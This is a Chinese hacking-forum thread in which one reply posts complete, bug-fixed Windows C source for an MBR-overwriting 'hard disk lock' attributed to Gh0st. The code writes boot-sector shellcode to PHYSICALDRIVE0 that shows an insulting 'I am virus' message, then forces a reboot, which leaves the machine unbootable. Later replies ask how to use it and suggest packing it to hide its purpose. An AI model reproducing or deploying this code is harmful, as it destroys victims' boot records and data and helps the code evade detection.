找回密码
 立即注册→加入我们

QQ登录

只需一步,快速开始

搜索
热搜: 下载 VB C 实现 编写
楼主: 账号已注销

该帖已删除

[复制链接]
发表于 2018-2-16 22:33:20 | 显示全部楼层
硬盘逻辑锁-Gh0st病毒核心
回复 赞! 靠!

使用道具 举报

发表于 2018-3-2 21:47:28 | 显示全部楼层
本帖最后由 套路 于 2018-3-24 22:12 编辑

1.源码没有声明函数,修改MBR后没有重启进入锁机界面。
修改后
  1. #include <windows.h>
  2. #include <winioctl.h>

  3. unsigned char scode[] =
  4. "\xb8\x12\x00\xcd\x10\xbd\x18\x7c\xb9\x18\x00\xb8\x01\x13\xbb\x0c"
  5. "\x00\xba\x1d\x0e\xcd\x10\xe2\xfe\x49\x20\x61\x6d\x20\x76\x69\x72"
  6. "\x75\x73\x21\x20\x46\x75\x63\x6b\x20\x79\x6f\x75\x20\x3a\x2d\x29";
  7. /*
  8. 00000000  B81200 mov ax, 12H ; ah = 0, al = 12h (640 * 480)
  9. 00000003  CD10 int 10h ; 进入图形显示方式,隐藏光标
  10. 00000005  BD187C mov bp, Msg ; ES:BP = 串地址
  11. 00000008  B91800 mov cx, 18h ; CX = 串长度
  12. 0000000B  B80113 mov ax, 1301h ; AH = 13,  AL = 01h
  13. 0000000E  BB0C00 mov bx, 000ch ; 页号为0(BH = 0) 黑底红字(BL = 0Ch,高亮)
  14. 00000011  BA1D0E mov dx, 0e1dh ; dh行, dl列
  15. 00000014  CD10 int 10h ; 10h 号中断
  16. 00000016  E2FE loop $
  17. Msg: db " I am virus! Fuck you ! :-("
  18. */
  19. int WINAPI WinMain(
  20.         HINSTANCE hInstance,  // handle to current instance
  21.         HINSTANCE hPrevInstance,  // handle to previous instance
  22.         LPSTR lpCmdLine,      // pointer to command line
  23.         int nCmdShow          // show state of window
  24. )
  25. {
  26.         HANDLE hDevice;
  27.         DWORD dwBytesWritten, dwBytesReturned;
  28.         BYTE pMBR[512] = { 0 };

  29.         // 重新构造MBR
  30.         memcpy(pMBR, scode, sizeof(scode) - 1);
  31.         pMBR[510] = 0x55;
  32.         pMBR[511] = 0xAA;

  33.         hDevice = CreateFile
  34.         (
  35.                 "\\\\.\\PHYSICALDRIVE0",
  36.                 GENERIC_READ | GENERIC_WRITE,
  37.                 FILE_SHARE_READ | FILE_SHARE_WRITE,
  38.                 NULL,
  39.                 OPEN_EXISTING,
  40.                 0,
  41.                 NULL
  42.         );
  43.         if (hDevice == INVALID_HANDLE_VALUE)
  44.                 return -1;
  45.         DeviceIoControl
  46.         (
  47.                 hDevice,
  48.                 FSCTL_LOCK_VOLUME,
  49.                 NULL,
  50.                 0,
  51.                 NULL,
  52.                 0,
  53.                 &dwBytesReturned,
  54.                 NULL
  55.         );
  56.         // 写入病毒内容
  57.         WriteFile(hDevice, pMBR, sizeof(pMBR), &dwBytesWritten, NULL);
  58.         DeviceIoControl
  59.         (
  60.                 hDevice,
  61.                 FSCTL_UNLOCK_VOLUME,
  62.                 NULL,
  63.                 0,
  64.                 NULL,
  65.                 0,
  66.                 &dwBytesReturned,
  67.                 NULL
  68.         );
  69.         CloseHandle(hDevice);
  70.         system("shutdown -r -t 0");
  71.         return 0;
  72. }
复制代码

2.shellcode 限定488个字符(扇区512字节-24字节汇编)
回复 赞! 靠!

使用道具 举报

发表于 2018-3-2 22:29:05 | 显示全部楼层
看看666666666
回复 赞! 靠!

使用道具 举报

发表于 2018-5-3 20:31:22 | 显示全部楼层

学习学习
回复

使用道具 举报

发表于 2018-5-23 12:36:35 | 显示全部楼层
感谢楼主共享
回复 赞! 靠!

使用道具 举报

发表于 2018-5-24 12:08:18 | 显示全部楼层
膜拜膜拜
回复

使用道具 举报

发表于 2018-5-24 20:42:58 | 显示全部楼层
学习解锁
回复

使用道具 举报

发表于 2018-6-9 16:22:53 | 显示全部楼层
1111111111
回复 赞! 靠!

使用道具 举报

发表于 2018-6-17 23:17:40 | 显示全部楼层
55555555555
回复 赞! 靠!

使用道具 举报

发表于 2018-6-18 11:43:10 | 显示全部楼层
555555555555555555555555
回复 赞! 靠!

使用道具 举报

发表于 2018-6-27 14:39:31 | 显示全部楼层
66666666666666666666666666666
回复 赞! 靠!

使用道具 举报

发表于 2018-7-5 22:01:19 | 显示全部楼层
这个怎么用
回复 赞! 靠!

使用道具 举报

发表于 2018-7-6 17:07:36 | 显示全部楼层
这个怎么用
回复 赞! 靠!

使用道具 举报

发表于 2018-7-22 08:55:42 | 显示全部楼层
看看。。。。。感谢分享
回复 赞! 靠!

使用道具 举报

发表于 2018-7-22 12:43:39 | 显示全部楼层
厉害厉害厉害
回复 赞! 靠!

使用道具 举报

发表于 2018-7-22 12:45:15 | 显示全部楼层





















回复 赞! 靠!

使用道具 举报

发表于 2018-7-22 12:47:18 | 显示全部楼层
这个加一下壳就更好了
回复 赞! 靠!

使用道具 举报

发表于 2018-7-22 12:54:44 | 显示全部楼层
加壳了别人就看不出啥来了2333
回复 赞! 靠!

使用道具 举报

发表于 2018-8-6 07:01:31 | 显示全部楼层
借鉴一下谢谢
回复 赞! 靠!

使用道具 举报

发表于 2018-8-29 09:42:41 | 显示全部楼层
看看看看看
回复 赞! 靠!

使用道具 举报

本版积分规则

QQ|Archiver|小黑屋|技术宅的结界 ( 滇ICP备16008837号 )|网站地图

GMT+8, 2024-12-22 17:04 , Processed in 0.025776 second(s), 15 queries , Gzip On.

Powered by Discuz! X3.5

© 2001-2024 Discuz! Team.

快速回复 返回顶部 返回列表